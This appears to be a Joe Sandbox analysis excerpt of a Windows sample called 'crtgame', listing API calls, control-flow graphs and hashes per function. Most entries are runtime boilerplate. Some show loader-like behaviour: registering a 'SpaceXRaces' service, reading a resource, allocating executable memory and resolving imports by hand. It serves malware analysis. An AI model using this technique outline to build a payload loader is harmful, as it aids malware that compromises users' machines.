                                                                          • Opcode ID: 78841f2a515f296da85e0e90675676ac3a79d5512f1734095c42bbe5f9917e88
                                                                          • Instruction ID: 04da20acb35bf9441239f1d62556dfb4fa7ea4fed694bd47aa7006e356793b78
                                                                          • Opcode Fuzzy Hash: 78841f2a515f296da85e0e90675676ac3a79d5512f1734095c42bbe5f9917e88
                                                                          • Instruction Fuzzy Hash: 8E01D2B2648300DEDA10AF65FE44A0A7BA4FBD4790B10857FF281771E0D739A851CA2E

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 165 4032aa-4032c8 HeapCreate 166 403300-403302 165->166 167 4032ca-4032d7 call 403162 165->167 170 4032e6-4032e9 167->170 171 4032d9-4032e4 call 403307 167->171 172 403303-403306 170->172 173 4032eb call 403b58 170->173 177 4032f0-4032f2 171->177 173->177 177->172 178 4032f4-4032fa HeapDestroy 177->178 178->166
                                                                          APIs
                                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402FD1,00000000), ref: 004032BB
                                                                            • Part of subcall function 00403162: GetVersionExA.KERNEL32 ref: 00403181
                                                                          • HeapDestroy.KERNEL32 ref: 004032FA
                                                                            • Part of subcall function 00403307: HeapAlloc.KERNEL32(00000000,00000140,004032E3,000003F8), ref: 00403314
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocCreateDestroyVersion
                                                                          • String ID:
                                                                          • API String ID: 2507506473-0
                                                                          • Opcode ID: 0b849b835aecce10534f7c8868f1023d210904a4762ffb57ab141a925f8bfac6
                                                                          • Instruction ID: 5e09d6e980c9b6bd0e9d6ae44655ccf46c8d477683af571ce1b4adb312d05453
                                                                          • Opcode Fuzzy Hash: 0b849b835aecce10534f7c8868f1023d210904a4762ffb57ab141a925f8bfac6
                                                                          • Instruction Fuzzy Hash: C5F065306543019AEB201F309E4AB2A3EA89754757F14483BF841FD1D1EF7D8691950E

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • RegisterServiceCtrlHandlerA.ADVAPI32(SpaceXRaces,Function_000023D3), ref: 00402436
                                                                          • SetServiceStatus.ADVAPI32(0040A058), ref: 00402495
                                                                          • GetLastError.KERNEL32 ref: 00402497
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004024A4
                                                                          • GetLastError.KERNEL32 ref: 004024C5
                                                                          • SetServiceStatus.ADVAPI32(0040A058), ref: 004024F5
                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00002351,00000000,00000000,00000000), ref: 00402501
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040250A
                                                                          • CloseHandle.KERNEL32 ref: 00402516
                                                                          • SetServiceStatus.ADVAPI32(0040A058), ref: 0040253F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                          • String ID: SpaceXRaces
                                                                          • API String ID: 3346042915-182686438
                                                                          • Opcode ID: cdb2bee97ed7bb97cf955b6f798025c993403a3b9e37aa79489956d55700b49b
                                                                          • Instruction ID: 823e7604a9f11b62abb5769871faa090ae10b28c447e591ffcb139ee33df3efb
                                                                          • Opcode Fuzzy Hash: cdb2bee97ed7bb97cf955b6f798025c993403a3b9e37aa79489956d55700b49b
                                                                          • Instruction Fuzzy Hash: F821A9B0841348EBD2119F36FF48E177FA8EB96719715813AE505B22B0C7BA0464DF2E

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 212 405b6f-405b9d 213 405be5-405be8 212->213 214 405b9f-405bb9 LCMapStringW 212->214 217 405bfa-405c02 213->217 218 405bea-405bf7 call 405d93 213->218 215 405bc3-405bd5 LCMapStringA 214->215 216 405bbb-405bc1 214->216 219 405bdb 215->219 220 405cfd 215->220 216->213 222 405c21-405c24 217->222 223 405c04-405c1c LCMapStringA 217->223 218->217 219->213 225 405cff-405d10 220->225 222->220 226 405c2a-405c2d 222->226 223->225 227 405c37-405c5b MultiByteToWideChar 226->227 228 405c2f-405c34 226->228 227->220 229 405c61-405c95 call 402da0 227->229 228->227 229->220 233 405c97-405cae MultiByteToWideChar 229->233 233->220 234 405cb0-405cc9 LCMapStringW 233->234 234->220 235 405ccb-405ccf 234->235 236 405d11-405d47 call 402da0 235->236 237 405cd1-405cd4 235->237 236->220 244 405d49-405d5f LCMapStringW 236->244 238 405cda-405cdd 237->238 239 405d8c-405d8e 237->239 238->220 241 405cdf-405cf7 LCMapStringW 238->241 239->225 241->220 241->239 244->220 245 405d61-405d66 244->245 246 405d68-405d6a 245->246 247 405d6c-405d6f 245->247 248 405d72-405d86 WideCharToMultiByte 246->248 247->248 248->220 248->239
                                                                          APIs
                                                                          • LCMapStringW.KERNEL32(00000000,00000100,004065F4,00000001,00000000,00000000,00000103,00000001,00000000,?,00404EE3,00200020,00000000,?,00000000,00000000), ref: 00405BB1
                                                                          • LCMapStringA.KERNEL32(00000000,00000100,004065F0,00000001,00000000,00000000,?,00404EE3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405BCD
                                                                          • LCMapStringA.KERNEL32(?,?,?,?,N@ ,?,00000103,00000001,00000000,?,00404EE3,00200020,00000000,?,00000000,00000000), ref: 00405C16
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00404EE3,00200020,00000000,?,00000000,00000000), ref: 00405C4E
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CA6
                                                                          • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CBC
                                                                          • LCMapStringW.KERNEL32(?,?,?,00000000,N@ ,?,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CEF
                                                                          • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405D57
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: String$ByteCharMultiWide
                                                                          • String ID: N@
                                                                          • API String ID: 352835431-2588724849
                                                                          • Opcode ID: 50f7acbb545500e936848391daa4b4f79838f587710a5a8d37350ffe5be9aa75
                                                                          • Instruction ID: 59135ce53bc3b83908b259842d99def5e9dba23692ba7c4f82a52b333c41bde6
                                                                          • Opcode Fuzzy Hash: 50f7acbb545500e936848391daa4b4f79838f587710a5a8d37350ffe5be9aa75
                                                                          • Instruction Fuzzy Hash: 69516B31500609ABDF218F54CD45E9F7BB9EB48710F10813AF912B12A0D33A9961EF69

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 249 4058a7-4058b2 250 4058b4-4058c3 LoadLibraryA 249->250 251 4058f6-4058fd 249->251 252 4058c5-4058da GetProcAddress 250->252 253 40592c-40592e 250->253 254 405915-405921 251->254 255 4058ff-405905 251->255 252->253 257 4058dc-4058f1 GetProcAddress * 2 252->257 256 405928-40592b 253->256 254->256 255->254 259 405907-40590e 255->259 257->251 259->254 260 405910-405913 259->260 260->254
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00404D6D,?,Microsoft Visual C++ Runtime Library,00012010,?,00406528,?,00406578,?,?,?,Runtime Error!Program: ), ref: 004058B9
                                                                          • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004058D1
                                                                          • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004058E2
                                                                          • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004058EF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$LibraryLoad
                                                                          • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll$xe@
                                                                          • API String ID: 2238633743-4073082454
                                                                          • Opcode ID: ee458f46fe1812a05d91eb71287a3930c9b5d9979fa11f14182ddc6a57f11331
                                                                          • Instruction ID: 33924f41f48bfa595f86144282b4f53d1c2fc39b1daf6c652de04afaa2dac454
                                                                          • Opcode Fuzzy Hash: ee458f46fe1812a05d91eb71287a3930c9b5d9979fa11f14182ddc6a57f11331
                                                                          • Instruction Fuzzy Hash: F4017171640711EFC7109FB5AD8091B3BE8EA887A0712043FA505F23E2DA7988619F2D

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 262 405dbe-405ded 263 405e2d-405e30 262->263 264 405def-405e05 GetStringTypeW 262->264 265 405e32-405e37 263->265 266 405e56-405e59 263->266 267 405e07-405e09 264->267 268 405e0b-405e1f GetStringTypeA 264->268 269 405e39 265->269 270 405e3e-405e51 GetStringTypeA 265->270 271 405ef3 266->271 272 405e5f-405e62 266->272 273 405e28 267->273 268->271 274 405e25-405e27 268->274 269->270 275 405ef5-405f06 270->275 271->275 276 405e64-405e69 272->276 277 405e6c-405e8e MultiByteToWideChar 272->277 273->263 274->273 276->277 277->271 278 405e90-405ec8 call 402da0 call 402ca0 277->278 278->271 284 405eca-405ee1 MultiByteToWideChar 278->284 284->271 285 405ee3-405ef1 GetStringTypeW 284->285 285->275
                                                                          APIs
                                                                          • GetStringTypeW.KERNEL32(00000001,004065F4,00000001,00000000,00000103,00000001,00000000,00404EE3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DFD
                                                                          • GetStringTypeA.KERNEL32(00000000,00000001,004065F0,00000001,?,?,00000000,00000000,00000001), ref: 00405E17
                                                                          • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00404EE3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405E4B
                                                                          • MultiByteToWideChar.KERNEL32(N@ ,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00404EE3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405E83
                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00405ED9
                                                                          • GetStringTypeW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00405EEB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: StringType$ByteCharMultiWide
                                                                          • String ID: N@
                                                                          • API String ID: 3852931651-2588724849
                                                                          • Opcode ID: b846b538efdd308b61092c0b21f0a934ff7444516eeaa1663e1030bce46bb4c8
                                                                          • Instruction ID: efd9f9df0c83a1a94f90d52e1acc00adac850a8b7f95784ade7c71040f2db77a
                                                                          • Opcode Fuzzy Hash: b846b538efdd308b61092c0b21f0a934ff7444516eeaa1663e1030bce46bb4c8
                                                                          • Instruction Fuzzy Hash: 6E414C72900619AFCF209F94DD85EAF7B78FB08750F10443AF912B2290D7398A619B99
                                                                          APIs
                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00404CB6
                                                                          • GetStdHandle.KERNEL32(000000F4,00406528,00000000,?,00000000,00000000), ref: 00404D8C
                                                                          • WriteFile.KERNEL32(00000000), ref: 00404D93
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: File$HandleModuleNameWrite
                                                                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                          • API String ID: 3784150691-4022980321
                                                                          • Opcode ID: 3f183e7b97676ec7bc44c608dee57f0da837cd1f80663b04b7f3573c67123c93
                                                                          • Instruction ID: 66213c8598c100419aca2a23d32cbd7848d5265dc6afe1337dc7fe815477c880
                                                                          • Opcode Fuzzy Hash: 3f183e7b97676ec7bc44c608dee57f0da837cd1f80663b04b7f3573c67123c93
                                                                          • Instruction Fuzzy Hash: 4B31A7B2600218BEEF20EA60DD49FDA376CEF85304F1005BBF545F61D1D6B8AD548A5D
                                                                          APIs
                                                                          • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FF6), ref: 0040477B
                                                                          • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FF6), ref: 0040478F
                                                                          • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FF6), ref: 004047BB
                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FF6), ref: 004047F3
                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FF6), ref: 00404815
                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402FF6), ref: 0040482E
                                                                          • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FF6), ref: 00404841
                                                                          • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040487F
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                          • String ID:
                                                                          • API String ID: 1823725401-0
                                                                          • Opcode ID: 5b86ae991fad7257a9556b843b73270ba3d506a60895f98d1aae2807b58742cd
                                                                          • Instruction ID: d94799acc24e98fca2fbef921ce91b810f6c8713fa78e77f5a065486d65e4eae
                                                                          • Opcode Fuzzy Hash: 5b86ae991fad7257a9556b843b73270ba3d506a60895f98d1aae2807b58742cd
                                                                          • Instruction Fuzzy Hash: CA31F2F75042A55ED7207BB59C8483B76DCE6C5358711893FFA42F3280E6398C4186A9
                                                                          APIs
                                                                          • FindResourceA.KERNEL32(00000000,0000000A,00000000), ref: 00402011
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,004023A6,00000190,00409F34,?,00000000), ref: 0040201D
                                                                          • SizeofResource.KERNEL32(00000000,?,?,?,?,?,004023A6,00000190,00409F34,?,00000000), ref: 0040202A
                                                                          • LoadResource.KERNEL32(00000000,?,?,?,?,?,004023A6,00000190,00409F34,?,00000000), ref: 00402044
                                                                          • LockResource.KERNEL32(00000000,?,?,?,?,?,004023A6,00000190,00409F34,?,00000000), ref: 0040204B
                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,004023A6,00000190,00409F34,?,00000000), ref: 00402056
                                                                          • GetTickCount.KERNEL32 ref: 00402092
                                                                          • GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,004023A6,00000190,00409F34), ref: 004020F8
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                          • String ID:
                                                                          • API String ID: 564119183-0
                                                                          • Opcode ID: f1ea5436b47a97949242679e62fd8c16215760983c098ca12679752f31ddac83
                                                                          • Instruction ID: ecab55d02aed30cb2302f8ec7062e98c1eb40003726056bc5c009be87fd8cf01
                                                                          • Opcode Fuzzy Hash: f1ea5436b47a97949242679e62fd8c16215760983c098ca12679752f31ddac83
                                                                          • Instruction Fuzzy Hash: 1C313C71A003456FDF118BB99E88AAF7F78EF49344B10803AFA46F72C1D6748940C768
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,759230D0,00000000,?,0040238C,00000000,?,00000000), ref: 004021E3
                                                                          • GetLastError.KERNEL32(?,?,?,?,0040238C,00000000), ref: 00402298
                                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000000,?,?,?,?,0040238C,00000000), ref: 004022A5
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004022E0
                                                                          • Sleep.KERNEL32(000003E8,?,?,?,?,0040238C,00000000), ref: 00402336
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: AddressAllocErrorLastLibraryLoadProcSleepVirtual
                                                                          • String ID: (
                                                                          • API String ID: 2871813557-3887548279
                                                                          • Opcode ID: 7f0dd8bc027646a7730874866425c3d0ac7d12c98f25a8e59b63077f83e1171d
                                                                          • Instruction ID: fa8a78d08e5b147245ce613c51b7eec45b3ed4bb95c194ee9eab5a02c05580c9
                                                                          • Opcode Fuzzy Hash: 7f0dd8bc027646a7730874866425c3d0ac7d12c98f25a8e59b63077f83e1171d
                                                                          • Instruction Fuzzy Hash: DE516375A00215EFDB14CF98C984BAEB7B5FF44304F2480AAE905AB3C1D7B5EA51CB94
                                                                          APIs
                                                                          • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,004032F0), ref: 00403B79
                                                                          • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,004032F0), ref: 00403B9D
                                                                          • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,004032F0), ref: 00403BB7
                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,004032F0), ref: 00403C78
                                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,004032F0), ref: 00403C8F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual$FreeHeap
                                                                          • String ID: @q@$@q@
                                                                          • API String ID: 714016831-1591251108
                                                                          • Opcode ID: 53fa90f427eeffaf6ecb660fffee8fa42559a5708230ede92574a81e60caacf4
                                                                          • Instruction ID: 6b7d5d1079877a4fdc04a989ad5d4427692f66b21ec07018b92eff91f37320a0
                                                                          • Opcode Fuzzy Hash: 53fa90f427eeffaf6ecb660fffee8fa42559a5708230ede92574a81e60caacf4
                                                                          • Instruction Fuzzy Hash: 47311071A447019BE3308F28DD49B22BBA8E74475AF00423BE155FB3D1E778B9008B0D
                                                                          APIs
                                                                          • GetVersionExA.KERNEL32 ref: 00403181
                                                                          • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 004031B6
                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403216
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: EnvironmentFileModuleNameVariableVersion
                                                                          • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                          • API String ID: 1385375860-4131005785
                                                                          • Opcode ID: ae729fa98e27c6751e545e4d597dad0f21c0824f8bd7fd76f6a38a193a7a3fad
                                                                          • Instruction ID: 0bfe33c8882bc5da799f901860b26a8a70e2baa25249e611fba62494fac00854
                                                                          • Opcode Fuzzy Hash: ae729fa98e27c6751e545e4d597dad0f21c0824f8bd7fd76f6a38a193a7a3fad
                                                                          • Instruction Fuzzy Hash: FA3124719052846EEB319A705C55BDA3F6C9B0730AF2404FFD085F92C2E63D8F8A8B19
                                                                          APIs
                                                                          • GetStartupInfoA.KERNEL32(?), ref: 004048EB
                                                                          • GetFileType.KERNEL32(00000800), ref: 00404991
                                                                          • GetStdHandle.KERNEL32(-000000F6), ref: 004049EA
                                                                          • GetFileType.KERNEL32(00000000), ref: 004049F8
                                                                          • SetHandleCount.KERNEL32 ref: 00404A2F
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: FileHandleType$CountInfoStartup
                                                                          • String ID:
                                                                          • API String ID: 1710529072-0
                                                                          • Opcode ID: 6f1dcd6f7bcd673d6421e3e5aab1f6b36c8d09db57b6c5e6c0d92ede4df305ad
                                                                          • Instruction ID: 4e5b6c2e9b57b0b0783508239f10a0ad73356ae994103a46a91c1c9ef3db655a
                                                                          • Opcode Fuzzy Hash: 6f1dcd6f7bcd673d6421e3e5aab1f6b36c8d09db57b6c5e6c0d92ede4df305ad
                                                                          • Instruction Fuzzy Hash: EF5124F16043608BD7208B38CD447673BA0BB81324F1A473AE6E6FB2E1D73C8855875A
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CA6
                                                                          • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CBC
                                                                          • LCMapStringW.KERNEL32(?,?,?,00000000,N@ ,?,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CEF
                                                                          • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405D57
                                                                          • WideCharToMultiByte.KERNEL32(?,00000220,?,00000000,N@ ,?,00000000,00000000,?,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405D7C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: String$ByteCharMultiWide
                                                                          • String ID: N@
                                                                          • API String ID: 352835431-2588724849
                                                                          • Opcode ID: 2e404fdc1400399f752b075283bc6775304d52c7d5638f1181ef196f2002daac
                                                                          • Instruction ID: 20da4dc5c4367d057857615b5720e39787682ab55b18fc8d36651601e05c1bdf
                                                                          • Opcode Fuzzy Hash: 2e404fdc1400399f752b075283bc6775304d52c7d5638f1181ef196f2002daac
                                                                          • Instruction Fuzzy Hash: 1C11D432900609ABDF228F94CD44ADFBBB6EB48750F148166FE16721A0D3368D61DF64
                                                                          APIs
                                                                          • VirtualFree.KERNEL32(000000FF,00000000,00008000,@q@,00403D9C,@q@,7591DFF0,?,00000000,?,?,00403E4E,00000010,00403103,?,?), ref: 00403CAB
                                                                          • HeapFree.KERNEL32(00000000,?,?,00403E4E,00000010,00403103,?,?), ref: 00403CE1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: Free$HeapVirtual
                                                                          • String ID: @q@$@q@
                                                                          • API String ID: 3783212868-1591251108
                                                                          • Opcode ID: 7ac4ff149bfc0749d320f4b1f8ac69e321ccad7dceeb4d9086af9ddb8db2ce1d
                                                                          • Instruction ID: f6895fdbbb123314fbd550313b942ac7b83e67952c1407439619f49545067eb6
                                                                          • Opcode Fuzzy Hash: 7ac4ff149bfc0749d320f4b1f8ac69e321ccad7dceeb4d9086af9ddb8db2ce1d
                                                                          • Instruction Fuzzy Hash: 88F03431A04210DFD3249F28EE09A427BF4FB08710B014A2AE4A6AB3E1C731AC40CF48
                                                                          APIs
                                                                          • GetCPInfo.KERNEL32(?,00000000), ref: 0040571A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: Info
                                                                          • String ID: $
                                                                          • API String ID: 1807457897-3032137957
                                                                          • Opcode ID: db703bf84d1e74bea7e02b3975d1c483e6a577ba1b4e559dc1a3ea706ac2fa80
                                                                          • Instruction ID: f7edae9c6ae74023553f5d2ec798d7d3c7047796f49532e24c337197b6512109
                                                                          • Opcode Fuzzy Hash: db703bf84d1e74bea7e02b3975d1c483e6a577ba1b4e559dc1a3ea706ac2fa80
                                                                          • Instruction Fuzzy Hash: 494154320007A85EEB15A724DD49BFB3FA9DB06704F1400F6D946FB192C27949289FAF
                                                                          APIs
                                                                          • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00403774,?,?,?,00000100,?,00000000), ref: 004039D4
                                                                          • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00403774,?,?,?,00000100,?,00000000), ref: 00403A08
                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00403774,?,?,?,00000100,?,00000000), ref: 00403A22
                                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,00403774,?,?,?,00000100,?,00000000), ref: 00403A39
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: AllocHeap$FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 3499195154-0
                                                                          • Opcode ID: 815b37c226e90a6b2b1dc44bc2b4124515e82b896c198061cc2002f0bf7c6368
                                                                          • Instruction ID: 429f96408e1d6026f999a6daa987e4c74961ce2be0a7022420d0a9926faab586
                                                                          • Opcode Fuzzy Hash: 815b37c226e90a6b2b1dc44bc2b4124515e82b896c198061cc2002f0bf7c6368
                                                                          • Instruction Fuzzy Hash: E4116A702003019FC7218F28EE49E267BB9FB957217184A3AF1D2E71B0D7729961CF09

                                                                          Execution Graph

